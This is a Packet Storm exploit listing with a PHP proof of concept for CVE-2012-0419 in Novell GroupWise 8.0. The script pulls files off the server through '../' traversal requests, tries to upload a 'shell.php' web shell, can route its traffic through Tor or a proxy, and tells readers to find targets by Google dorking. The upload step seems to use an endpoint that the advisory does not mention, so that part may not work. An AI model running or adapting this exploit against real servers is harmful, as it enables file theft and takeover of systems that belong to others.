📄 Novell GroupWise 8.0 Traversal / Code Injection

🗓️ 05 Feb 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 125 Views

GroupWise 8.0 directory traversal and code injection enabling file theft and web shell upload.

Reporter	Title	Published	Views	Family All 13
Circl	CVE-2012-0419	29 May 201815:50	–	circl
Check Point Advisories	Novell GroupWise HTTP Interfaces Arbitrary File Retrieval (CVE-2012-0419)	4 Mar 201300:00	–	checkpoint_advisories
CVE	CVE-2012-0419	28 Sep 201210:00	–	cve
Cvelist	CVE-2012-0419	28 Sep 201210:00	–	cvelist
Tenable Nessus	Novell GroupWise Internet Agent 8.x < 8.0.3 / 12.x < 12.0.1 Multiple Vulnerabilities	24 Sep 201200:00	–	nessus
Metasploit	Novell Groupwise Agents HTTP Directory Traversal	7 Feb 201320:15	–	metasploit
NVD	CVE-2012-0419	28 Sep 201210:40	–	nvd
Packet Storm	Novell Groupwise Agents HTTP Directory Traversal	1 Sep 202400:00	–	packetstorm
Packet Storm	📄 Novell GroupWise 2012 Traversal / Shell Upload	9 Feb 202600:00	–	packetstorm
Prion	Directory traversal	28 Sep 201210:40	–	prion

=============================================================================================================================================
    | # Title     : Novell GroupWise 8.0 before Support Pack 3 PHP Code Injection Vulnerability                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.novell.com/documentation//gw8/gw8_readmeen_sp3/data/gw8_readmeen_sp3.html                                       |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code exploits the Directory Traversal vulnerability in Novell GroupWise to steal files, and attempts to upload a Web Shell payload if possible, making it an effective penetration testing tool.
    	
    	( https://packetstorm.news/files/id/181042/	CVE-2012-0419 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 124
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class NovellGroupwiseExploit {
        private $target;
        private $port;
        private $filePath;
        private $depth;
        private $proxy;
        private $useTor;
        private $osList = ['Windows', 'Linux', 'MacOS'];
    
        public function __construct($target, $port = 7181, $filePath = '/windows/win.ini', $depth = 10, $proxy = null, $useTor = false) {
            $this->target = $target;
            $this->port = $port;
            $this->filePath = $filePath;
            $this->depth = $depth;
            $this->proxy = $proxy;
            $this->useTor = $useTor;
        }
    
        private function sendRequest($url, $postData = null) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            
            if ($this->proxy) {
                curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
            }
            
            if ($this->useTor) {
                curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
                curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
            }
            
            if ($postData) {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
            }
            
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        private function isGroupwise() {
            $url = "http://{$this->target}:{$this->port}/";
            $response = $this->sendRequest($url);
            return strpos($response, 'GroupWise') !== false;
        }
    
        public function exploit() {
            if (!$this->isGroupwise()) {
                echo "[!] {$this->target}:{$this->port} - Not a GroupWise Agent HTTP Interface\n";
                return;
            }
            
            foreach ($this->osList as $os) {
                echo "[*] Checking for OS: $os\n";
            }
            
            $traversal = str_repeat("../", $this->depth) . ltrim($this->filePath, '/');
            $url = "http://{$this->target}:{$this->port}/help/" . $traversal;
            
            echo "[*] Sending request to $url ...\n";
            $response = $this->sendRequest($url);
            
            if ($response) {
                $fileName = basename($this->filePath);
                file_put_contents($fileName, $response);
                echo "[+] File saved: $fileName\n";
            } else {
                echo "[!] Failed to retrieve file\n";
            }
        }
    
        public function uploadPayload($payloadPath) {
            $uploadUrl = "http://{$this->target}:{$this->port}/upload";
            echo "[*] Attempting to upload payload to $uploadUrl ...\n";
    
            $payload = file_get_contents($payloadPath);
            if (!$payload) {
                echo "[!] Failed to read payload file\n";
                return;
            }
    
            $boundary = "----WebKitFormBoundary" . md5(time());
            $data = "--$boundary\r\n";
            $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($payloadPath) . "\"\r\n";
            $data .= "Content-Type: application/octet-stream\r\n\r\n";
            $data .= $payload . "\r\n";
            $data .= "--$boundary--\r\n";
    
            $headers = [
                "Content-Type: multipart/form-data; boundary=$boundary"
            ];
    
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $uploadUrl);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
            if ($this->proxy) {
                curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
            }
            
            if ($this->useTor) {
                curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
                curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
            }
    
            $result = curl_exec($ch);
            curl_close($ch);
    
            if ($result) {
                echo "[+] Payload uploaded successfully!\n";
            } else {
                echo "[!] Failed to upload payload\n";
            }
        }
    }
    
    $target = '192.168.1.100'; // قم بتغيير الهدف
    $exploit = new NovellGroupwiseExploit($target, 7181, '/windows/win.ini', 10, 'http://127.0.0.1:8080', false);
    $exploit->exploit();
    
    // تجربة رفع حمولة
    $payloadPath = 'shell.php'; // قم بتغيير اسم الحمولة
    $exploit->uploadPayload($payloadPath);
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

05 Feb 2026 00:00Current

5.3Medium risk

Vulners AI Score5.3

CVSS 25

EPSS0.75143